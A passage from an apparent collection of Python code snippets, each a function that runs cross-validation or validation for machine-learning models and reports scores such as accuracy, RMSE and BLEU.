train_df[columns]\n test_data = test_df[columns]\n\n print(f'Fitting the model on train dataset of size {len(train_data)}')\n model.fit(train_data, train_df['meter_reading'])\n print(f'Predicting for test dataset of size {len(test_data)}')\n predictions = model.predict(test_data)\n\n score = self._calculate_score(predictions, test_df['meter_reading'])\n print(f'Score: {score}')\n\n summaries.append(FoldSummary(\n train_start=train_start,\n train_end=train_end,\n test_start=test_start,\n test_end=test_end,\n score=score\n ))\n\n filename = f'../resources/runs/{time.time()}.txt'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w+') as f:\n f.write(f'{model.__class__.__name__}\\n')\n f.write(f'{str(model.get_params())}\\n')\n for summary in summaries:\n f.write(f'Summary (\\n'\n f'\\ttrain start: {summary.train_start}\\n'\n f'\\ttrain end: {summary.train_end}\\n'\n f'\\ttest start: {summary.test_start}\\n'\n f'\\ttest end: {summary.test_end}\\n'\n f'\\tscore: {summary.score}\\n'\n f')\\n')\n\n print(summaries)\n\n return model", "def validate(args, data_loader, model, vocab, global_stats):\n eval_time = Timer()\n val_loss = AverageMeter()\n \n all_output_seqs = []\n all_target_seqs = []\n all_input_seqs = []\n \n for batch_idx, (input_idxs, target_idxs, input_tokens, _) in enumerate(data_loader):\n \n input_lengths = (input_idxs != 0).long().sum(dim=1)\n sorted_lengths, order = torch.sort(input_lengths, descending=True)\n \n # No grad mode\n with torch.no_grad():\n \n input_variable = Variable(input_idxs[order, :][:, :max(input_lengths)], requires_grad=False)\n target_variable = Variable(target_idxs[order, :], requires_grad=False)\n batch_size = input_variable.shape[0]\n # Sort the input token lists by length\n all_input_seqs.extend(np.array(input_tokens)[order.cpu().numpy()].tolist())\n \n output_log_probs, output_seqs = model(input_variable, list(sorted_lengths))\n all_output_seqs.extend(trim_seqs(output_seqs))\n all_target_seqs.extend([list(seq[seq > 0])] for seq in to_np(target_variable))\n\n flattened_log_probs = output_log_probs.view(batch_size * model.max_length, -1)\n batch_losses = model.citerion(flattened_log_probs, target_variable.contiguous().view(-1))\n\n val_loss.update(batch_losses[0], batch_size)\n \n bleu_score = corpus_bleu(all_target_seqs, all_output_seqs, smoothing_function=SmoothingFunction().method1)\n \n logger.info('dev valid : Epoch = %d | Loss = %.2f | Bleu = %.2f' %\n (global_stats['epoch'], val_loss.avg * 100, bleu_score * 100) +\n '| examples = %d | valid time = %.2f (s)' %\n (len(all_output_seqs), eval_time.time()))\n \n if args.display_samples:\n for sentence_input, sentence_pred, sentence_gold in zip(all_input_seqs[-5:], all_output_seqs[-5:], all_target_seqs[-5:]):\n sentence_gold = sentence_gold[0]\n \n sentence_gold = seq_to_string(np.array(sentence_gold), vocab.id2word, input_tokens=sentence_input.split(' '))\n sentence_pred = seq_to_string(np.array(sentence_pred), vocab.id2word, input_tokens=sentence_input.split(' '))\n \n print('Predicted : %s ' % (sentence_pred))\n print('-----------------------------------------------')\n print('Gold : %s ' % (sentence_gold))\n print('===============================================')\n\n \n return {'bleu_score': bleu_score * 100}", "def cross_validate_model(self, X_train, y_train):\n\n\t\t# Build a stratified k-fold cross-validator object\n\t\tskf = StratifiedKFold(n_splits=10, shuffle=True, random_state=42)\n\n\t\t'''\n\t\tEvaluate the score by cross-validation\n\t\tThis fits the classification model on the training data, according to the cross-validator\n\t\tand reports the scores.\n\t\tAlternative: sklearn.model_selection.cross_validate\n\t\t'''\n\t\tscores = cross_val_score(self.classifier, X_train, y_train, scoring='accuracy', cv=skf)\n\n\t\tprint(\"%.2f seconds: Cross-validation finished\" % time.process_time())\n\n\t\t# Log the cross-validation scores, the mean score and the 95% confidence interval, according to:\n\t\t# http://scikit-learn.org/stable/modules/cross_validation.html#computing-cross-validated-metrics\n\t\t# https://en.wikipedia.org/wiki/Standard_error#Assumptions_and_usage\n\t\t# print(\"Scores = %s\" % scores)\n\t\t# print(\"Accuracy: %0.2f (±%0.2f)\" % (scores.mean()*100, scores.std()*2*100))\n\t\t# ↳ https://docs.scipy.org/doc/numpy/reference/generated/numpy.std.html", "def crossValidate(self, args):\n\n ##################################\n # Read the training data\n ##################################\n if not os.path.isdir(args.annotationPath):\n print('annotation path does not exist: {}' \\\n .format(args.annotationPath))\n return -1\n\n data = self.readData(args.annotationPath)\n\n ############################\n # Execute the K-Fold cross validation\n ############################\n\n x = []\n y = []\n l = []\n for subject, df in data.items():\n lx = df[['gradient', 'rate']].values.tolist()\n #lx = df[['rate']].values.tolist()\n ly = np.array(df[['immersion']].values.tolist()).squeeze(-1)\n x.extend(lx)\n y.extend(ly.tolist())\n l.append(len(lx))\n\n x = np.array(x)\n y = np.array(y)\n\n print('Executing cross-validation with k = {}...'.format(args.k))\n clf = StructuredPerceptron(random_state=2)\n scores = []\n folds = SequenceKFold(l, n_folds=args.k)\n for train_idx, train_len, test_idx, test_len in folds:\n xTrain = x[train_idx]\n yTrain = y[train_idx]\n clf.fit(xTrain, yTrain, train_len)\n\n xTest = x[test_idx]\n yTest = y[test_idx]\n yPred = clf.predict(xTest, test_len)\n scores.append(accuracy_score(yTest, yPred))\n\n scores = np.array(scores)\n print(scores)\n print('Result of the K-Fold CV: {:3f} (+- {:3f})' \\\n .format(scores.mean(), 2 * scores.std()))\n\n ############################\n # Execute the Leave-One-Out cross validation\n ############################\n\n\n return 0", "def crossvalidate(*args, **kwargs):\n\n scores = []\n j = 0\n for i, _ in enumerate(data):\n if i in good_patients:\n\n if 'silent' in kwargs:\n if kwargs['silent']:\n pass\n else:\n print \"real patient index:\", i\n else:\n print \"real patient index:\", i\n\n kwargs['patient_index'] = j\n score, reconstruction = runmodel(*args, **kwargs)\n scores.append(score)\n\n if 'save_reconstruction' in kwargs:\n if kwargs['save_reconstruction']:\n scipy.misc.imsave(\"patient_{}_reconstruction.png\".format(i), reconstruction)\n j += 1\n\n cvmodel = args[0].__class__.__name__\n print \"{} overall cross validated score {}\".format(cvmodel, np.mean(scores))\n return np.mean(scores)", "def _cross_validate(self, fit_params={}):\n\n # Flatten the true labels for the training data\n y_train = self.y_train.values if self.y_train.shape[1] > 1 else self.y_train.values.ravel()\n\n if self.model.estimator_type == \"classifier\":\n\n # Get unique labels for classification\n labels = np.unique(y_train)\n\n # Set up a dictionary for the scoring metrics\n scoring = {'accuracy':'accuracy'}\n\n # Prepare arguments for the scorers\n metric_args = self.model.metric_args\n \n if 'average' in metric_args and metric_args['average'] is not None:\n # If the score is being averaged over classes a single scorer per metric is sufficient\n scoring['precision'] = metrics.make_scorer(metrics.precision_score, **metric_args)\n scoring['recall'] = metrics.make_scorer(metrics.recall_score, **metric_args)\n scoring['fscore'] = metrics.make_scorer(metrics.f1_score, **metric_args)\n\n output_format = \"clf_overall\"\n else:\n # If there is no averaging we will need multiple scorers; one for each class\n for label in labels:\n metric_args['pos_label'] = label\n metric_args['labels'] = [label]\n scoring['precision_'+str(label)] = metrics.make_scorer(metrics.precision_score, **metric_args)\n scoring['recall_'+str(label)] = metrics.make_scorer(metrics.recall_score, **metric_args)\n scoring['fscore_'+str(label)] = metrics.make_scorer(metrics.f1_score, **metric_args)\n \n output_format = \"clf_classes\"\n\n elif self.model.estimator_type == \"regressor\":\n scoring = ['r2', 'neg_mean_squared_error', 'neg_mean_absolute_error', 'neg_median_absolute_error', 'explained_variance']\n \n # Perform cross validation using the training data and the model pipeline\n scores = cross_validate(self.model.pipe, self.X_train, y_train, scoring=scoring, cv=self.model.cv, fit_params=fit_params, return_train_score=False)\n\n # Prepare the metrics data frame according to the output format\n if self.model.estimator_type == \"classifier\": \n # Get cross validation predictions for the confusion matrix\n y_pred = cross_val_predict(self.model.pipe, self.X_train, y_train, cv=self.model.cv, fit_params=fit_params)\n\n # Prepare the confusion matrix and add it to the model\n self._prep_confusion_matrix(y_train, y_pred, labels)\n\n # Create an empty data frame to set the structure\n metrics_df = pd.DataFrame(columns=[\"class\", \"accuracy\", \"accuracy_std\", \"precision\", \"precision_std\", \"recall\",\\\n \"recall_std\", \"fscore\", \"fscore_std\"])\n\n if output_format == \"clf_overall\": \n # Add the overall metrics to the data frame\n metrics_df.loc[0] = [\"overall\", np.average(scores[\"test_accuracy\"]), np.std(scores[\"test_accuracy\"]),\\\n np.average(scores[\"test_precision\"]), np.std(scores[\"test_precision\"]),\\\n np.average(scores[\"test_recall\"]), np.std(scores[\"test_recall\"]),\\\n np.average(scores[\"test_fscore\"]), np.std(scores[\"test_fscore\"])]\n\n elif output_format == \"clf_classes\":\n # Add accuracy which is calculated at an overall level\n metrics_df.loc[0] = [\"overall\", np.average(scores[\"test_accuracy\"]), np.std(scores[\"test_accuracy\"]),\\\n np.NaN, np.NaN, np.NaN, np.NaN, np.NaN, np.NaN]\n\n # Add the metrics for each class to the data frame\n for i, label in enumerate(labels):\n metrics_df.loc[i+1] = [label, np.NaN, np.NaN, np.average(scores[\"test_precision_\"+str(label)]),\\\n np.std(scores[\"test_precision_\"+str(label)]), np.average(scores[\"test_recall_\"+str(label)]),\\\n np.std(scores[\"test_recall_\"+str(label)]), np.average(scores[\"test_fscore_\"+str(label)]),\\\n np.std(scores[\"test_fscore_\"+str(label)])]\n \n # Finalize the structure of the result DataFrame\n metrics_df.loc[:,\"model_name\"] = self.model.name\n metrics_df = metrics_df.loc[:,[\"model_name\", \"class\", \"accuracy\", \"accuracy_std\", \"precision\", \"precision_std\", \"recall\",\\\n \"recall_std\", \"fscore\", \"fscore_std\"]]\n\n # Add the score to the model\n self.model.score = metrics_df[\"accuracy\"].values[0]\n\n elif self.model.estimator_type == \"regressor\":\n # Create an empty data frame to set the structure\n metrics_df = pd.DataFrame(columns=[\"r2_score\", \"r2_score_std\", \"mean_squared_error\", \"mean_squared_error_std\",\\\n \"mean_absolute_error\", \"mean_absolute_error_std\", \"median_absolute_error\", \"median_absolute_error_std\",\\\n \"explained_variance_score\", \"explained_variance_score_std\"])\n \n # Add the overall metrics to the data frame\n metrics_df.loc[0] = [np.average(scores[\"test_r2\"]), np.std(scores[\"test_r2\"]),\\\n np.average(scores[\"test_neg_mean_squared_error\"]), np.std(scores[\"test_neg_mean_squared_error\"]),\\\n np.average(scores[\"test_neg_mean_absolute_error\"]), np.std(scores[\"test_neg_mean_absolute_error\"]),\\\n np.average(scores[\"test_neg_median_absolute_error\"]), np.std(scores[\"test_neg_median_absolute_error\"]),\\\n np.average(scores[\"test_explained_variance\"]), np.std(scores[\"test_explained_variance\"])]\n \n # Finalize the structure of the result DataFrame\n metrics_df.loc[:,\"model_name\"] = self.model.name\n metrics_df = metrics_df.loc[:,[\"model_name\", \"r2_score\", \"r2_score_std\", \"mean_squared_error\", \"mean_squared_error_std\",\\\n \"mean_absolute_error\", \"mean_absolute_error_std\", \"median_absolute_error\", \"median_absolute_error_std\",\\\n \"explained_variance_score\", \"explained_variance_score_std\"]]\n\n # Add the score to the model\n self.model.score = metrics_df[\"r2_score\"].values[0]\n\n # Save the metrics_df to the model\n self.model.metrics_df = metrics_df", "def main(args):\n dataset = MelSpectrogramDataset(args.dataset_file, args.label_file,\n args.context, None, device, None)\n\n # Split train and test datasets\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n train_dataset, test_dataset = torch.utils.data.random_split(\n dataset, [train_size, test_size])\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n validation_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n\n model = get_model(args.model_name, dataset.vector_length).to(device)\n\n optimizer = getattr(torch.optim, args.optimizer)(model.parameters(),\n lr=args.lr,\n weight_decay=args.wd)\n\n loss_func = F.cross_entropy\n\n training_loss = []\n # Train\n for epoch in tqdm(range(args.num_epochs)):\n\n loss_epoch = []\n\n for input_vector, label in train_loader:\n label = label.to(dtype=torch.long,\n device=device,\n non_blocking=False)\n\n input_vector = input_vector.to(device, non_blocking=False)\n input_vector = input_vector.float()\n\n pred = model(input_vector).transpose(1, 2)\n\n optimizer.zero_grad()\n\n loss = loss_func(pred, label)\n\n loss.backward()\n\n optimizer.step()\n\n loss_epoch.append(loss.item())\n\n print(f\"Loss at epoch {epoch} is {sum(loss_epoch)/len(loss_epoch)}\")\n training_loss.append(sum(loss_epoch) / len(loss_epoch))\n validation_losses = validate(args, model, loss_func, validation_loader)\n\n # Graph training loss\n y_loss = np.array(training_loss)\n x_epochs = np.arange(1, len(y_loss) + 1)\n sns.set()\n loss_plot = sns.lineplot(x=x_epochs, y=y_loss)\n loss_plot.set(xlabel='Epoch', ylabel='Cross Entropy Loss')\n plt.title('Training Loss')\n plt.show()", "def validate(model, dataloader):\n model.eval()\n device = model.device \n epoch_start = time.time() \n running_loss = 0.0\n running_accuracy = 0.0 \n all_prob, all_labels = [], []\n\n with torch.no_grad():\n for (batch_seqs, batch_seq_masks, batch_seq_segments, batch_labels) in dataloader:\n seqs = batch_seqs.to(device) \n masks = batch_seq_masks.to(device)\n segments = batch_seq_segments.to(device)\n labels = batch_labels.to(device)\n \n loss, logits, probabilities = model(seqs, masks, segments, labels)\n running_loss += loss.item()\n running_accuracy += correct_predictions(probabilities, labels)\n \n all_prob.extend(probabilities[:, 1].cpu().numpy())\n all_labels.extend(batch_labels)\n epoch_time = time.time() - epoch_start \n epoch_loss = running_loss / len(dataloader)\n epoch_accuracy = running_accuracy / (len(dataloader.dataset))\n # epoch_f1 = epoch_accuracy \n return epoch_time, epoch_loss, epoch_accuracy, roc_auc_score(all_labels, all_prob),", "def cross_validate(model, X, y, folds=5, epochs=5, batch_size=32, callbacks=None, shuffle=False, random_state=None):\n\n # Initalize KFold\n kfolds = KFold(n_splits=folds, random_state=random_state, shuffle=shuffle)\n all_metrics = []\n\n # To build the model\n if type(model).__name__ == 'SVDpp':\n model.implicit_feedback(X[:10, :])\n model(X[:10, :])\n\n # Workaround to reset weights after each fold fit\n weights = model.get_weights()\n i = 1\n\n for train, val in kfolds.split(X, y):\n\n # Gather implicit feedback if model is SVD++\n if type(model).__name__ == 'SVDpp':\n model.implicit_feedback(X[train])\n\n print(f'\\nFitting on Fold {i}')\n # Train and evaluate metrics\n history = model.fit(\n X[train], y[train], batch_size=batch_size, epochs=epochs, callbacks=callbacks)\n print(f'\\nEvaluating on Fold {i}')\n fold_score = history.model.evaluate(X[val], y[val])\n all_metrics.append(fold_score)\n\n # Reset Weights\n model.set_weights(weights)\n\n i += 1\n\n all_metrics = np.array(all_metrics)\n\n for i, metric in enumerate(model.metrics_names):\n print(f'Mean {metric.capitalize()} : {np.mean(all_metrics.T[i])}')\n\n return all_metrics", "def cross_valid(model,x,folds,metric,verbose=True): \r\n\r\n score=[]\r\n \r\n\r\n kf = KFold(folds,shuffle=False,random_state=0) \r\n\r\n\r\n i=0\r\n for train_index, test_index in kf.split(x):\r\n\r\n xtrain = x[train_index,:]\r\n xtest = x[test_index,:]\r\n\r\n model.fit(xtrain[:,:-1],xtrain[:,-1])\r\n\r\n ypred = model.predict(xtest[:,:-1])\r\n\r\n ytrue= xtest[:,-1] \r\n \r\n \r\n if metric == 'mae':\r\n score.append(mae(ytrue,ypred))\r\n elif metric == 'mse':\r\n score.append(mse(ytrue,ypred))\r\n elif metric == 'rrmse':\r\n score.append(rrmse(ytrue,ypred))\r\n\r\n else:\r\n score.append(rmse(xtest[:,-1],ypred))\r\n\r\n if verbose:\r\n print('-'*30)\r\n print(f'\\nFold {i+1} out of {folds}')\r\n print(f'{metric}: {score[i]}')\r\n\r\n i+=1\r\n\r\n if verbose:\r\n print(f'\\n Overall Score:')\r\n print(f'{metric}: Mean: {np.mean(score)} Std: {np.std(score)}')\r\n\r\n\r\n return score", "def validate(self):\n\n # start validate\n self.model.eval()\n preds, labels = [], []\n for batch_idx, data in enumerate(self.valid_dataloader):\n # calculate and log losses\n losses_report, valid_preds, valid_labels = self.forward_one_batch(\n data)\n self._update_losses(losses_report, train=False)\n\n preds.append(valid_preds)\n labels.append(valid_labels)\n\n preds = np.concatenate(preds, axis=0)\n labels = np.concatenate(labels, axis=0)\n if IS_REG:\n preds = disc(preds)\n # calculate and log metrics\n metrics_report = self.evaluate_metrics(preds, labels)\n self._update_metrics(metrics_report, train=False)\n\n # TODO: lr scheduler step setting\n self.lr_scheduler.step(self.valid_loss_meters['CrossEntropyLoss'].avg)\n\n # end validate\n self.model.train()", "def cross_validate(X, Y, folds=5):\n\n log = LogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,\n intercept_scaling=1, max_iter=200, multi_class='ovr', n_jobs=3,\n penalty='l2', random_state=None, solver='liblinear', tol=0.0001,\n verbose=0, warm_start=False)\n \n\n \n\n\n scores_log = [] \n scores_forest = []\n index = np.arange(X.shape[0])\n score_log = 0\n score_forest = 0\n \n for i in range(folds):\n score_log = 0\n score_forest = 0\n \n test_index = np.random.choice(index, int(X.shape[0]*1/folds),replace=False)\n index = np.setdiff1d(np.arange(X.shape[0]),test_index)\n \n test_x = X[test_index]\n test_y = Y[test_index]\n\n log.fit(X[index],Y[index])\n pred_log = log.predict(test_x)\n \n ran.fit(X[index],Y[index])\n pred_ran = ran.predict(test_x)\n \n for i in range(len(test_y)):\n if(pred_log[i] == test_y[i]):\n score_log += 1\n if(pred_ran[i] == test_y[i]):\n score_forest += 1\n scores_log.append(score_log/len(test_y))\n scores_forest.append(score_forest/len(test_y))\n \n\n return (np.mean(scores_log),np.mean(scores_forest))", "def LOSO_cross_validation(signal, device):\n rf = RandomForestClassifier(random_state=0)\n hyperparams = {\"n_estimators\": [30, 50, 100], \"max_depth\": [10, 30, 50]}\n clf = GridSearchCV(estimator=rf, param_grid=hyperparams, scoring=\"accuracy\", cv=None, refit=True, verbose=0)\n\n all_subjects_but_one = []\n for subject_out in range(0, 51):\n for subject_in in range(0, 51):\n if subject_in == subject_out:\n print(f'Leaving subject {subject_out} out: \\n ==================================================')\n else:\n _, _, _, _, normalized_all_feature, all_labels = input_features_labels(device=device,\n signal=signal,\n subject_ID=subject_in)\n feature_label = pd.concat([normalized_all_feature, all_labels], axis=1)\n all_subjects_but_one.append(feature_label)\n\n all_subjects_but_one = pd.concat(all_subjects_but_one, axis=0)\n all_subjects_but_one = all_subjects_but_one.dropna()\n feature_train = all_subjects_but_one.drop(columns=['Activity_ID'])\n label_train = all_subjects_but_one['Activity_ID']\n print(feature_train)\n print(label_train)\n\n _, _, _, _, feature_test, label_test = input_features_labels(device=device,\n signal=signal, subject_ID=subject_out)\n print(feature_test)\n print(label_test)\n clf.fit(feature_train, label_train)\n print('Best parameters: ', clf.best_params_)\n prediction = clf.predict(feature_test)\n report = sklearn.metrics.classification_report(label_test, prediction, digits=3, zero_division=1)\n\n conf_matrix = confusion_matrix(label_test, prediction)\n print(conf_matrix.shape[0])\n # plotitng_confusion_matrix(confusion_matrix=con_matrix, evaluation_mode='personal', subject_ID=subject_ID)\n print(report)\n for row in range(conf_matrix.shape[0]):\n print(f'Accuracy for class {row}: ',\n accuracy_per_class(conf_matrix=conf_matrix, row_index=row, to_print=False))\n\n all_subjects_but_one = []", "def do_cross_val(sem, data_desc, perf_ml_model, ml_model_desc, ml_model, train_feature,\n train_result):\n scores = cross_val_score(ml_model, train_feature, train_result, cv = NUM_KFOLD,\n scoring = 'neg_mean_absolute_error')\n if VERB: \n print(\"model: %s - score: %f\" % (ml_model_desc, statistics.mean(scores)))\n perf_ml_model[(sem, data_desc, ml_model_desc)] = statistics.mean(scores)", "def cross_validate(self, pre_train=None, **kwargs):\n \n inferred = np.nan * np.ones_like(self.labels_array)\n N_training_set, N_labels = inferred.shape\n N_stop_at = kwargs.pop(\"N\", N_training_set)\n\n debug = kwargs.pop(\"debug\", False)\n \n kwds = { \"threads\": self.threads }\n kwds.update(kwargs)\n\n for i in range(N_training_set):\n \n training_set = np.ones(N_training_set, dtype=bool)\n training_set[i] = False\n\n # Create a clean model to use so we don't overwrite self.\n model = self.__class__(\n self.training_labels[training_set],\n self.training_fluxes[training_set],\n self.training_flux_uncertainties[training_set],\n **kwds)\n\n # Initialise and run any pre-training function.\n for _attribute in self._descriptive_attributes:\n setattr(model, _attribute[1:], getattr(self, _attribute[1:]))\n\n if pre_train is not None:\n pre_train(self, model)\n\n # Train and solve.\n model.train()\n\n try:\n inferred[i, :] = model.fit(self.training_fluxes[i],\n self.training_flux_uncertainties[i], full_output=False)\n\n except:\n logger.exception(\"Exception during cross-validation on object \"\n \"with index {0}:\".format(i))\n if debug: raise\n\n if i == N_stop_at + 1:\n break\n\n return inferred[:N_stop_at, :]", "def crossValidation(data, output_variable_name):\r\n X, xt, y, yt = train_test_split(\r\n data.drop(output_variable_name, axis=1), data[output_variable_name], test_size=0.01, random_state=SEED)\r\n\r\n model = pickle.load(open(\"models/lasso.sav\", 'rb'))\r\n lassoCV = -mean(cross_val_score(model, X, y, cv=5, scoring='neg_root_mean_squared_error'))\r\n\r\n model = pickle.load(open(\"models/ridge.sav\", 'rb'))\r\n ridgeCV = -mean(cross_val_score(model, X, y, cv=5, scoring='neg_root_mean_squared_error'))\r\n\r\n model = pickle.load(open(\"models/decisionTree.sav\", 'rb'))\r\n decTreeCV = -mean(cross_val_score(model, X, y, cv=5, scoring='neg_root_mean_squared_error'))\r\n\r\n param = {\r\n 'max_depth': 15,\r\n 'eta': 0.1,\r\n 'objective': 'reg:squarederror',\r\n 'nthread': 16,\r\n \"subsample\": 0.5,\r\n \"colsample_bytree\": 0.5,\r\n 'eval_metric': 'rmse'\r\n }\r\n num_round = XGB_EPOCH_NR\r\n\r\n dtrain = xgb.DMatrix(X, label=y)\r\n xgbCV = xgb.cv(\r\n param,\r\n dtrain,\r\n num_boost_round=num_round,\r\n seed=SEED,\r\n nfold=5,\r\n metrics={'rmse'}\r\n )[\"test-rmse-mean\"][-1:]\r\n\r\n param = {\r\n \"iterations\": 400,\r\n \"learning_rate\": 0.02,\r\n \"depth\": 12,\r\n \"eval_metric\": 'RMSE',\r\n \"random_seed\": 23,\r\n \"bagging_temperature\": 0.2,\r\n \"od_type\": 'Iter',\r\n \"metric_period\": 75,\r\n \"od_wait\": 100\r\n }\r\n\r\n catBoostCV = cv(data, param, fold_count=5, plot=True)\r\n\r\n return lassoCV, ridgeCV, decTreeCV, xgbCV, catBoostCV", "def __implement_cross_validation(self, X, y, model):\n\n skfolds = StratifiedKFold(n_splits=3, random_state=42)\n\n for train_index, test_index in skfolds.split(X, y):\n clone_clf = clone(model)\n X_train_folds = X[train_index]\n y_train_folds = y[train_index]\n X_test_fold = X[test_index]\n y_test_fold = y[test_index]\n\n clone_clf.fit(X_train_folds, y_train_folds)\n y_pred = clone_clf.predict(X_test_fold)\n n_correct = sum(y_pred == y_test_fold)\n message = \"ratio of correct predictions: \", n_correct / len(y_pred)\n self.__logger.info(message)", "def cv(data, folds, model):\n def rmsle(predicted, actual):\n # Root Mean Squared Logarithmic Error\n return mean_squared_error(\n np.log(predicted+1),\n np.log(actual+1)\n ) ** 0.5\n\n errors = []\n print \" Cross Validation in progress...\"\n kf = cross_validation.KFold(n=len(data.index), n_folds=folds)\n for i, (train_index, validation_index) in enumerate(kf):\n print ' F%d.' % i\n train = data.iloc[train_index]\n validation = data.iloc[validation_index]\n\n model.fit(train)\n prediction = model.predict(validation)\n actual = data.iloc[validation_index]['count'].as_matrix()\n error = rmsle(prediction, actual)\n errors.append(error)\n return np.mean(errors)", "def cross_validation(self):\r\n kfold = KFold(10, shuffle=True, random_state=1)\r\n data = self.read_data()\r\n # error from each kth iteration\r\n errors = []\r\n for train, test in kfold.split(data):\r\n\r\n #Splitting into test and training data\r\n X_test, Y_test = data[test][:, 1], data[test][:, 2]\r\n X_train, Y_train = data[train][:, 1], data[train][:, 2]\r\n\r\n #Training on the split data\r\n weights, design_matrix = self.train(X_train, Y_train)\r\n\r\n y_pred = self.make_prediction(X_test, weights)\r\n self.plot(y_true=Y_test, y_pred=y_pred, x=X_test)\r\n\r\n #error matrix\r\n errors.append(np.mean(y_pred - Y_test) ** 2)\r\n\r\n #cross-validation parameter taken as mean of errors obtained from each iteration\r\n print(\"%0.10f mean with a standard deviation of %0.10f across the k-folds\" % (np.mean(errors), np.std(errors)))", "def train_and_score_pipeline(pipeline, automl, full_X_train, full_y_train):\n start = time.time()\n cv_data = []\n logger.info(\"\\tStarting cross validation\")\n X_pd = _convert_woodwork_types_wrapper(full_X_train.to_dataframe())\n y_pd = _convert_woodwork_types_wrapper(full_y_train.to_series())\n y_pd_encoded = y_pd\n # Encode target for classification problems so that we can support float targets. This is okay because we only use split to get the indices to split on\n if is_classification(automl.problem_type):\n y_mapping = {original_target: encoded_target for (encoded_target, original_target) in enumerate(y_pd.value_counts().index)}\n y_pd_encoded = y_pd.map(y_mapping)\n for i, (train, valid) in enumerate(automl.data_splitter.split(X_pd, y_pd_encoded)):\n if pipeline.model_family == ModelFamily.ENSEMBLE and i > 0:\n # Stacked ensembles do CV internally, so we do not run CV here for performance reasons.\n logger.debug(f\"Skipping fold {i} because CV for stacked ensembles is not supported.\")\n break\n logger.debug(f\"\\t\\tTraining and scoring on fold {i}\")\n X_train, X_valid = full_X_train.iloc[train], full_X_train.iloc[valid]\n y_train, y_valid = full_y_train.iloc[train], full_y_train.iloc[valid]\n if is_binary(automl.problem_type) or is_multiclass(automl.problem_type):\n diff_train = set(np.setdiff1d(full_y_train.to_series(), y_train.to_series()))\n diff_valid = set(np.setdiff1d(full_y_train.to_series(), y_valid.to_series()))\n diff_string = f\"Missing target values in the training set after data split: {diff_train}. \" if diff_train else \"\"\n diff_string += f\"Missing target values in the validation set after data split: {diff_valid}.\" if diff_valid else \"\"\n if diff_string:\n raise Exception(diff_string)\n objectives_to_score = [automl.objective] + automl.additional_objectives\n cv_pipeline = None\n try:\n logger.debug(f\"\\t\\t\\tFold {i}: starting training\")\n cv_pipeline = EngineBase.train_pipeline(pipeline, X_train, y_train, automl.optimize_thresholds, automl.objective)\n logger.debug(f\"\\t\\t\\tFold {i}: finished training\")\n if automl.optimize_thresholds and pipeline.can_tune_threshold_with_objective(automl.objective) and automl.objective.can_optimize_threshold:\n logger.debug(f\"\\t\\t\\tFold {i}: Optimal threshold found ({cv_pipeline.threshold:.3f})\")\n logger.debug(f\"\\t\\t\\tFold {i}: Scoring trained pipeline\")\n scores = cv_pipeline.score(X_valid, y_valid, objectives=objectives_to_score)\n logger.debug(f\"\\t\\t\\tFold {i}: {automl.objective.name} score: {scores[automl.objective.name]:.3f}\")\n score = scores[automl.objective.name]\n except Exception as e:\n if automl.error_callback is not None:\n automl.error_callback(exception=e, traceback=traceback.format_tb(sys.exc_info()[2]), automl=automl,\n fold_num=i, pipeline=pipeline)\n if isinstance(e, PipelineScoreError):\n nan_scores = {objective: np.nan for objective in e.exceptions}\n scores = {**nan_scores, **e.scored_successfully}\n scores = OrderedDict({o.name: scores[o.name] for o in [automl.objective] + automl.additional_objectives})\n score = scores[automl.objective.name]\n else:\n score = np.nan\n scores = OrderedDict(zip([n.name for n in automl.additional_objectives], [np.nan] * len(automl.additional_objectives)))\n\n ordered_scores = OrderedDict()\n ordered_scores.update({automl.objective.name: score})\n ordered_scores.update(scores)\n ordered_scores.update({\"# Training\": y_train.shape[0]})\n ordered_scores.update({\"# Validation\": y_valid.shape[0]})\n\n evaluation_entry = {\"all_objective_scores\": ordered_scores, \"score\": score, 'binary_classification_threshold': None}\n if is_binary(automl.problem_type) and cv_pipeline is not None and cv_pipeline.threshold is not None:\n evaluation_entry['binary_classification_threshold'] = cv_pipeline.threshold\n cv_data.append(evaluation_entry)\n training_time = time.time() - start\n cv_scores = pd.Series([fold['score'] for fold in cv_data])\n cv_score_mean = cv_scores.mean()\n logger.info(f\"\\tFinished cross validation - mean {automl.objective.name}: {cv_score_mean:.3f}\")\n return {'cv_data': cv_data, 'training_time': training_time, 'cv_scores': cv_scores, 'cv_score_mean': cv_score_mean}", "def cross_validation(feature_train, help_rank_train, model_name):\n clf = svm.SVC(kernel='linear', C=1).fit(feature_train, help_rank_train)\n clf_model = open(model_name,'wb')\n dump(clf, clf_model, -1)\n return", "def sklearn_train() -> None:\n cross_validate(args=SklearnTrainArgs().parse_args(), train_func=run_sklearn)", "def rmsle_cv(model, dataset,y):\r\n kf = KFold(n_folds, shuffle=True, random_state=42).get_n_splits(dataset)\r\n rmse= np.log(-cross_val_score(model, dataset, y, scoring=\"neg_mean_absolute_error\", cv = kf))\r\n return(rmse)", "def cross_validation(exp_name):\n click.echo(\"Mode: Cross-validation.\")\n # defaults = get_defaults()\n\n # fitted_model_filename = add_extension(fitted_model_filename)\n\n # derive final path for fitted model as base output path for fitted models + model filename\n # fitted_model_path = os.path.join(defaults.OUTPUT.FITTED_MODELS_PATH, fitted_model_filename)\n # new_options = [\"OUTPUT.FITTED_MODEL_PATH\", fitted_model_path]\n\n # don't reserve dev set at this point since we need to do it in each cv fold\n boot_data = bootstrap(new_options=None, mode=\"cv\")\n\n defaults = boot_data['defaults']\n X_train, y_train = boot_data['data']\n\n cv = RepeatedStratifiedKFold(n_splits=defaults.EVAL.N_SPLITS,\n n_repeats=defaults.EVAL.N_REPEATS,\n random_state=defaults.MISC.SEED)\n\n s = time.time()\n outer_results, outer_preds = cross_validate(X=X_train, y=y_train,\n cv=cv,\n conf=defaults)\n print(\"Execution time: %s seconds.\" % (time.time() - s))\n\n # dump results\n # fitted_model_best_params_path = os.path.join(defaults.OUTPUT.PARAMS_PATH,\n # \"best_params_{}.pkl\".format(fitted_model_filename.split('.')[0]))\n\n outer_results_formatted = show_cross_val_results(outer_results, conf=defaults)\n\n cv_results_path = os.path.join(defaults.OUTPUT.RESULTS_PATH, \"cv_results_{}.csv\".format(exp_name))\n outer_results_formatted.to_csv(cv_results_path)\n\n # save predictions\n 